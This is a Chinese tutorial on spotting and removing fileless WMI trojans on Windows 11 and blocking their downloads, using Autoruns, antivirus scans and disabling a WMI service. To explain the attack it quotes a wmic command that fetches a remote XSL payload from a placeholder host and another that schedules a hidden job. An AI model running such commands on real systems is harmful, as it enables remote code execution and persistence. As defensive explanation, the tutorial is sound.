Win11系統(tǒng)如何完美查殺WMI木馬 WMI木馬防范教程
Win11系統(tǒng)WMI木馬查殺教程!WMI(即Windows Management Instrumentation的簡稱)是Windows的一個核心組件。我們可以借助該組件實現(xiàn)腳本部署、進程枚舉、監(jiān)控目錄修改等常見的操作,一些不懷好意的開發(fā)者則利用WMI的這些特性生成木馬來危害我們的電腦。由于WMI是系統(tǒng)組件,這樣WMI木馬可以實現(xiàn)“無文件”方式運行,難以被分析及檢測到。那么如果電腦被WMI木馬入侵會有什么表現(xiàn),我們又該怎樣對其進行查殺和防范呢?
1. 了解WMI惡意軟件的運行機制
如上所述,WMI具備的功能非常豐富,對于黑客來說只要利用其中的命令就可以完成很多操作。比如獲得相應的權(quán)限后,在目標電腦上使用“wmic os get /FORMAT:"http://www.xxxx.com:80/123.xsl"”命令就可以實現(xiàn)從網(wǎng)站服務器上下載所需的惡意軟件123.xsl(圖1)。

當然在實際運行中,這些惡意軟件還可以利用WMI進行更多的操作,如使用“wmic job call create "123.exe",0,0,true,false,********154800.000000+480”命令創(chuàng)建一個在后臺運行的任務計劃,甚至可以執(zhí)行創(chuàng)建系統(tǒng)服務、將DLL文件注入系統(tǒng)進程等操作。因為這里使用的都是系統(tǒng)命令(wmic.exe),并不像常規(guī)的木馬、病毒那樣由本體執(zhí)行,所以稱之為“無文件”(嚴格來說是WMI腳本運行,腳本被觸發(fā)后執(zhí)行下載木馬等操作)方式運行。比如臭名昭著的“KingMiner挖礦木馬”,它通過WMI事件訂閱來不斷地觸發(fā)木馬在后臺運行。
●火速鏈接:
本刊2018年6期文章《解決WMI進程資源占用的問題》介紹了WMI的相關(guān)知識。
2. 發(fā)現(xiàn)和識別WMI惡意軟件
WMI木馬的一個重要特性就是借助WMI腳本來下載或者激活木馬運行。比如某WMI挖礦木馬感染電腦后會在系統(tǒng)里生成一個任務計劃,任務會在后臺連接到服務器下載挖礦木馬。挖礦木馬運行后會占用系統(tǒng)大量的資源和帶寬,導致Windows在日常使用時運行緩慢,網(wǎng)頁打開速度也變得很慢,且電腦的硬盤指示燈一直在閃爍(因為木馬會在后臺不斷地讀取數(shù)據(jù))。如果自己的電腦在使用時有上述的異?,F(xiàn)象,那么就需要使用安全軟件檢查是否中了木馬。
Windows 10用戶可以先使用系統(tǒng)自帶的“安全中心”進行查殺,如果無法解決問題則可以借助一些木馬專殺軟件,如火絨惡性木馬專殺工具(https://bbs.huorong.cn/thread-18575-1-1.html)進行查殺,啟動軟件后點擊“立即掃描”,常見的木馬(包括WMI木馬)一般都可以被自動查殺(圖2)。

不過,如果中了WMI木馬,安全軟件只會將WMI腳本下載的木馬文件刪除,但是無法完全斬斷WMI木馬文件的下載途徑,如上述介紹的WMI挖礦木馬就是利用任務計劃進行下載。因為任務計劃中并沒有惡意軟件,安全軟件是不會將其刪除的,所以通過專殺軟件刪除木馬后,每次重啟系統(tǒng)掃描后還是一直提示發(fā)現(xiàn)木馬文件,那么就極可能中了WMI木馬,這時就還需要對系統(tǒng)的啟動項進行檢查,查看是否有異常的啟動項。
系統(tǒng)啟動項檢查可以借助Autoruns來完成(https://docs.microsoft.com/zh-cn/sysinternals/downloads/autoruns),啟動程序后它會自動對本機所有的啟動項目進行檢測,包括計劃任務、服務、WMI等(圖3)。

比如筆者公司的一臺電腦在執(zhí)行安全掃描時就發(fā)現(xiàn)木馬文件無法徹底刪除的現(xiàn)象,在本機運行Autoruns后切換到“計劃任務”,在打開的窗口中就可以看到后臺所有的任務計劃。對于沒有數(shù)字簽名的任務,程序會使用淺紅色進行標注,可以看到本機中一個名為“lsmosee”的任務極為可疑,它加載的是本機臨時目錄中的一個VBS文件(圖4)。

在上圖選中“lsmosee”并右擊,選擇“跳轉(zhuǎn)到文件夾”,在打開的文件夾中根據(jù)圖上“鏡像路徑”的提示,使用記事本打開“54236.vbs”文件,其中顯示的正是一些WMI腳本的內(nèi)容,它的作用就是在后臺定時下載木馬文件?,F(xiàn)在按提示將其刪除。接著返回上圖,選中“lsmosee”任務并點擊“刪除”,這樣就可以切斷木馬的下載通道。最后使用火絨安全軟件再掃描一遍電腦,刪除其他帶毒的文件后,問題得到順利的解決(圖5)。

3. 一勞永逸封禁WMI木馬下載
WMI木馬難以查殺的原因就是由于它的下載方式是通過WMI腳本實現(xiàn),而且WMI腳本激活的方法很多(如上例為任務計劃,有些則是使用進程注入等),不過WMI腳本的運行要依賴“WMI Performance Adapter”服務,因此對于個人用戶來說,可以通過停用服務的方法來禁止WMI腳本的運行。在桌面的任務欄搜索框中輸入“服務”,打開服務管理組件后找到上述服務,雙擊打開后將其停止,并將其啟動類型設置為“禁用”,這樣本機所有的WMI腳本就無法運行了(圖6)。

注意:
禁用WMI服務可能會導致一些網(wǎng)絡服務無法使用。禁用服務如果影響電腦使用,請及時進行恢復。
以上就是腳本之家小編給大家分享的Win11系統(tǒng)WMI木馬查殺教程了, 希望大家喜歡!
相關(guān)文章

微軟承認Win11四月更新KB5083769/KB5082052致遠程桌面無法使用
微軟確認Windows 11四月更新KB5083769與KB5082052存在缺陷,導致遠程桌面(RDP)功能異常,下面我們就來看看兩種臨時解決辦法2026-04-24
Win11用戶反饋安裝4月更新KB5083769后遇到打印故障
Win11用戶反饋安裝微軟4月更新后遇到打印故障,在建立連接時會彈出安全警告,導致默認阻斷打印機重定向,用戶必須在連接設置中手動勾選打印機選項才能執(zhí)行打印操作,下面我2026-04-23
裝機初次設置可跳過強制更新! 外媒實測Win11 OOBE 新增稍后更新
2026年4月22日,科技媒體實測確認Windows 11在初次設置(OOBE)環(huán)節(jié)已支持跳過強制系統(tǒng)更新,用戶可直接進入桌面后再手動更新2026-04-23
問題已修復! 解決Win11/Win10提示重新連接你的文件歷史記錄
Win11/Win10用戶反饋,故障主要表現(xiàn)為系統(tǒng)持續(xù)彈出“重新連接你的文件歷史記錄”警告,導致自動備份流程被迫中斷,現(xiàn)在這個問題已經(jīng)修復了2026-04-22
Win11 RP 26x00.8313預覽版發(fā)布: 附KB5083631完整更新日志
微軟發(fā)布Win11KB5083631,24H2 用戶安裝后版本號升至 Builds 26100.8313;25H2 用戶安裝后版本號升至 Build 26200.8313,這個版本帶來的變化有任務欄可監(jiān)控 AI 智能體、修2026-04-18
Win11 Canary預覽版28020.1863/29570.1000發(fā)布:優(yōu)化文件管理器右鍵菜單
今天微軟測試Windows 11預覽版 28020.1863 和 29570.1000 預覽版,這兩個版本主要優(yōu)化文件管理器右鍵菜單,下面我們就來看看詳細更新內(nèi)容2026-04-18
Win11 KB5083726/KB5083728更新發(fā)布:附完整更新日志
微軟發(fā)布 Win11 Beta 26220.8271/Dev 26300.8276 預覽版,這個版本主要帶來優(yōu)化文件管理器、改善輸入等變化2026-04-18
Win11 26H1預覽版28000.1836發(fā)布:附KB5083768完整更新日志
微軟為win11推送了四月專屬更新KB5083768 ,用戶安裝后版本號升至 28000.1836,這個版本主要提升網(wǎng)絡穩(wěn)定性、改進安全啟動2026-04-15
Win11 24H2/25H2預覽版26x00.8246發(fā)布:附KB5083769完整更新日志
微軟為win11推送周二補丁KB5083769,安裝后 25H2 版本升級至 Build 26200.8246,24H2 版本升級至 Build 26100.8246,詳細更新內(nèi)容請看下文介紹2026-04-15
微軟曝光Windows11開始菜單未用原型:動態(tài)磁貼情懷難消
,4月10日,微軟設計團隊通過Instagram平臺公開了Windows 11開始菜單的五種未被采納的原型方案,這一做法不僅揭開了產(chǎn)品設計背后的決策過程,也向行業(yè)展示了用戶需求在界面2026-04-13


